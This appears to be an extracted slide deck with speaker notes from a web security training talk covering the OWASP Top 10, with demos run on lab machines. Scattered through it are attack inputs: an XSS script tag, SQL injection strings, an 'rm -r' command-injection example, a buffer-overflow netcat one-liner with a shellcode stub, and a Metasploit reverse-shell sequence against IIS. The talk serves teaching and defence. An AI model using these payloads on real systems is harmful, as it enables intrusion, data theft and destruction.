1. Web Security Martin Nystrom, CISSP Security Architect
Cisco Systems, Inc.

2. Who am I? Security Architect in Cisco’s InfoSec
Responsible for consulting with application teams to secure their architecture
Monitor for infrastructure vulnerabilities
Infrastructure security architect
12 years developing application architectures
Java programmer
Master of Engineering – NC State University
Bachelor’s - Iowa State University – (1990)

3. Why worry?
Guess.com sanctioned by FTC for exposing private information
“…permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database.”
U.S. Army systems hacked using WebDAV vulnerability in IIS
“…it was a disturbingly successful attack, experts say, because the intruder found and exploited a flaw that took security researchers completely by surprise. “
Millions of credit card numbers compromised at Data Processors International
"All indications are the attack on this company's (Internet) address came from the outside, and efforts continue to analyze this attack to see if it could be traced to the attacker," the investigator said.
Utah ISP is victim of retaliation following hackers' attack on Al-Jazeera
“…impersonating an Al-Jazeera employee, tricked the Web addressing company Network Solutions into making technical changes that effectively turned over temporary control of the network's Arabic and English Web sites...'' 
What would you do?
WebDav:
US Army article:
UTexas article:
DPI article:
…” A hacker who recently gained access to millions of credit card numbers appears to have done it by breaking into a computer system at a company that processes transactions for catalog companies and other direct marketers”
Kevin Mitnick’s site hacked:
…” A hacker calling himself "BugBear" added one page to Mitnick's corporate Web site on January 30 with a message, "Welcome back to freedom, Mr. Kevin," and added that "it was fun and easy to break into your box." He included a photograph of a polar bear with two cubs. “

4. Why worry? (cont.)
Note the rate of growth in incidents.

5. The goal of an attack Steal data Blackmail Beachhead for other attacks
Bragging rights
Vandalism
Demonstrate vulnerability/satisfy curiosity
Damage company reputation
What do you need for a credit card attack to be successful?
How can you program that to make it more secure?
Beachhead: To avoid detection, hop onto multiple servers in multiple countries to route your attack. Example: Route your attack through N. Korea or China
Bragging rights:
Vandalism: Al-Jazeera site
Embarrass:

6. A word of warning These tools and techniques can be dangerous
The difference between a hacker and a cracker is…permission
Admins will see strange activity in logs, and come looking for you
Authorities are prosecuting even the “good guys” for using these tools

7. Commonly attacked services
SMTP servers (port 25)
sendmail: “The address parser performs insufficient bounds checking in certain conditions due to a char to int conversion, making it possible for an attacker to take control of the application”
RPC servers (port 111 & others)
NetBIOS shares (ports 135, 139, 445)
Blaster worm
Sasser worm
FTP servers (ports 20, 21)
wuftpd vulnerabilities
SSH servers (port 22)
OpenSSH, PAM vulnerabilities
Web servers (ports 80, 443)
Apache chunked encoding vulnerability
Sendmail:
“The address parser performs insufficient bounds checking in certain conditions due to a char to int conversion, making it possible for an attacker to take control of the application. “
NetBIOS: Blaster worm:
RPC:
FTP: wuftpd vulnerability
SSH: OpenSSH vulnerability
Privilege separation: “The basic idea behind privilege separation is that OpenSSH sshd(8) has something like lines of code. A lot of them run as root. However, when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privileges. This makes the daemon less vulnerable to attack.”
HTTP: Apache
Exploit code:

8. Web server attack Scan to find open ports
Find out what’s running on open ports (banner grabbing)
Profile the server
Windows (look for Kerberos, NetBIOS, AD)
Unix
Use TCP fingerprinting
Probe for weaknesses on interesting ports
Default configuration files and settings (e.g. popular IIS ones)
Buffer overflows
Insecure applications
Launch attack
Use exploit code from Internet…
…or build your own
WebDAV exploit:
Compiled exploit:

9. Scanning… What O/S is this system?
Active Directory ports (3268, 3269) and DNS indicate that this is a Windows server, probably a domain controller.

10. Scanning… What O/S is this system?
Show nmap scan against linuxvm, makes a guess at the remote O/S.
This is Linux, note port 111 open.

11. Example Web Application
Internet
DMZ
Protected
network
Internal
network
AJP
IIOP T9
etc. DB
Clear-text or SSL
Web
server
App
server
(optional)
HTTP request
Web app
Web app
Web app
transport DB
Web app
Web client: IE, Mozilla, etc.
Apache
IIS
Netscape
etc.
J2EE server
ColdFusion
Oracle 9iAS
etc.
Perl
C++
CGI
Java
ASP
PHP
etc.
ADO
ODBC
JDBC
etc.
Oracle
SQL Server
etc.
HTTP reply (HTML, JavaScript, VBScript, etc.)

12. OWASP Top 10 Web Application Security Vulnerabilities
Unvalidated parameters
Broken access control
Broken account/session management
Cross-site scripting flaws
Buffer overflows
Command injection flaws
Error handling problems
Insecure use of cryptography
Remote administration flaws
Web and app server mis-configuration

13. Principles Turn off un-needed services Keep systems patched
Don’t trust input
Watch for logic holes
Only provide the necessary information
Hide sensitive information
Encryption
Access controls

14. #1: Unvalidated Parameters
Attacker can easily change any part of the HTTP request before submitting
URL
Cookies
Form fields
Hidden fields
Headers
Encoding is not encrypting
Toasted Spam:
Input must be validated on the server (not just the client).
CoolCarts:
Countermeasures
Tainting (Perl)
Code reviews (check variable against list of allowed values, not vice-versa)
Application firewalls
CodeSeeker:
Real-time auditing:
Input validation demo
Edit hidden values on form
Remember to modify action on the form too (replace /cgi-bin with
Re-open in browser and click “Preview total”
Do NOT submit order
Encoding/encrypting demo
1) Start linuxvm
2) Open Sleuth
3) Set Intercept & have it break on all responses
4) Browse to
Basic auth for manager/manager in Tomcat manager app: bWFuYWdlcjptYW5hZ2Vy
Use this tool for decoding:
Or use this tool…
java -classpath c:\javalib\dnsjava\dnsjava jar;c:\dev\Base64Decoder\classes Base64 decode <text>
Alternative to test against unvalidated parameters:
Go to “Hidden field tampering”
Save page to disk
Open page in TextPad
search for “price” – change price
search for “action” – change action to
Open page in browser and click “purchase”
Notes on perl tainting:
#!/usr/local/bin/perl –T
The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. In Perl, the first () group match gets assigned to $1, the second () group to $2, and so on.
Perl considers these new variables that arise from () groups to be untainted. Once your regular expression has created these variables, you can use them as your new untainted values.

15. #2: Broken Access Control
Usually inconsistently defined/applied
Examples
Forced browsing past access control checks
Path traversal
File permissions – may allow access to config/password files
Client-side caching
Countermeasures
Use non-programmatic controls
Verify access control via central container
Code reviews
Open
Go to “Weak Authentication Cookie”
Use Sleuth, set Intercept to stop on AuthCookie
Log in as dave/dave
Observe pattern for cookie encoding (encoding is backwards twice + advance one letter)
Log in as jeff/jeff in another browser (requires session hijacking)
Change AuthCookie to “ggfkggfk” for Jeff: AuthCookie=ggfkggfk;

16. #3: Broken Account and Session Management
Weak authentication
Password-only
Easily guessable usernames (admin, etc.)
Unencrypted secrets are sniffable
How to break in
Guess/reset password
Have app you new password
Sniff or crack password
Backend authentication
How are database passwords stored?
Trust relationships between hosts (IP address can be spoofed, etc.)
Countermeasures
Strong passwords
Remove default user names
Protect sensitive files
Use brutus to guess manager password, show how it could be used to break into admin account
Target: linuxvm/manager/html
Port: 8080
Type: HTTP (Basic Auth)
Method HEAD
Use Username checked, Single User checked, Userid=manager
BREAK IN
Show sniffer in win2kvm
Brute force crackers:
Show passwords, database stuff at:

17. #4: Cross-Site Scripting (XSS)
Attacker uses trusted application/company to reflect malicious code to end-user
Attacker can “hide” the malicious code
Unicode encoding
2 types of attacks
Stored
Reflected
Wide-spread problem!
Countermeasures
input validation
Positive
Negative: “< > ( ) # &”
Don’t forget these: “&lt &gt &#40 &#41 &#35 &#38”
User/customer education
Stored example:
Go to Database XSS example, and store the following in the message field:
<script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
For reflected attack, add the above line to
Example of what this can do:
CitiBank Phishing scam:

18. #5: Buffer Overflows Mostly affects web/app servers
Can affect apps/libraries too
Goal: crash the target app and get a shell
Buffer overflow example
echo “vrfy `perl –e ‘print “a” x 1000’`” |nc 25
Replace all those “a”s with something like this…
char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”
Countermeasures
Keep up with bug reports/patches
Code reviews
Run with limited privileges
Use “safer” languages like Java
C:\eviltools\overflow-example\Smasher.html
Enter DDDDDDDDDDD (11 D’s) You can look up the ASCII function call with…
Example against IIS:
Java security:
Re:Speed issues aside (Score:5, Funny) by quantum bit (225091) on Monday September (# ) (Last Journal: Friday October No buffer overflows Without throwing an exception and crashing the program. No dereferencing of null pointers Without crashing the program (java.lang.NullPointerException). No object creation failures (all "new"s succeed)
Automatic bounds checking
Exception handling
Buffer overflow attack against win2kvm
Make sure web server is running on win2kvm (Start/Programs/Administrative Tools/Internet Services Manager)
Launch Metasploit Framework
setg RHOST win2kvm
Setg LHOST
Setg PAYLOAD winreverse
Use exploit iis50_nsiislog_post
Check
Show targets
Set TARGET 0
Setg LPORT 52000
exploit

19. #6: Command Injection
Allows attacker to relay malicious code in form variables or URL
System commands
SQL
Interpreted code (Perl, Python, etc.)
Many apps use calls to external programs
sendmail
Examples
Path traversal: “../”
Add more commands: “; rm –r *”
SQL injection: “’ OR 1=1”
Countermeasures
Taint all input
Avoid system calls (use libraries instead)
Run with limited privileges
SQL injection example:
Go to
Generate error by putting a quote at the end of the user name and a simple password.
Try username = ' or username like 's%‘ – note that the password is wrong
Try ' or username like 's%‘ or ‘– for username with password = anything
You are now logged in as sam speed

20. #7: Error Handling Examples: stack traces, DB dumps
Helps attacker know how to target the app
Inconsistencies can be revealing too
“File not found” vs. “Access denied”
Fail-open errors
Need to give enough info to user w/o giving too much info to attacker
Countermeasures
Code review
Modify default error pages (404, 401, etc.)
Fail open auth example is…
Won’t work with passwords, but if you try it _without_ a password, it lets you in. Show sample code.
Show 401 error message on after logging in, shows “plsql” in path.

21. Error messages example

22. #8: Poor Cryptography
Insecure storage of credit cards, passwords, etc.
Poor choice of algorithm (or invent your own)
Poor randomness
Session IDs
Tokens
Cookies
Improper storage in memory
Countermeasures
Store only what you must
Store a hash instead of the full value (SHA-1)
Use only vetted, public cryptography
Demonstrate md5 tool with on Windows XP laptop with:
md5 –dhello
md5 –djello
Demonstrate encryption with PGP
pgp –e /home/mnystrom/example.txt mnystrom
(produces example.txt.pgp)
pgp /home/mnystrom/example.txt.pgp

23. #9: Remote Administration Flaws
Problems
Weak authentication (username=“admin”)
Weak encryption
Countermeasures
Don’t place admin interface on same server
Use strong authentication: certificates, tokens, strong passwords, etc.
Encrypt entire session (VPN or SSL)
Control who has accounts
IP restrictions
Example:
Example ColdFusion:

24. #10: Web/App Server Misconfiguration
Tension between “work out of the box” and “use only what you need”
Developers ≠ web masters
Examples
Unpatched security flaws (BID example)
Misconfigurations that allow directory traversal
Administrative services accessible
Default accounts/passwords
Countermeasures
Create and use hardening guides
Turn off all unused services
Set up and audit roles, permissions, and accounts
Set up logging and alerts
Oracle 9ias examples:
IIS Hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Technical Reference NT IIS 5_0 and Win2K Hardening Configuration.htm
Apache hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Apache hardening guide.doc
Examples: Show how an administrator might want to change admin web site properties for Admin web server, select “Directory Security/IP address and domain name restrictions/Edit…”

25. Principles Turn off un-needed services Keep systems patched
Don’t trust input
Watch for logic holes
Only provide the necessary information
Hide sensitive information
Encryption
Access controls

26. Tools used in this preso
WebGoat –vulnerable web applications for demonstration
VMWare – runs Linux & Windows 2000 virtual machines on demo laptop.
nmap –host/port scanning to find vulnerable hosts
Ethereal – network traffic sniffing
Metasploit Framework – exploit tool
Brutus – password cracking
Sleuth – HTTP mangling against web sites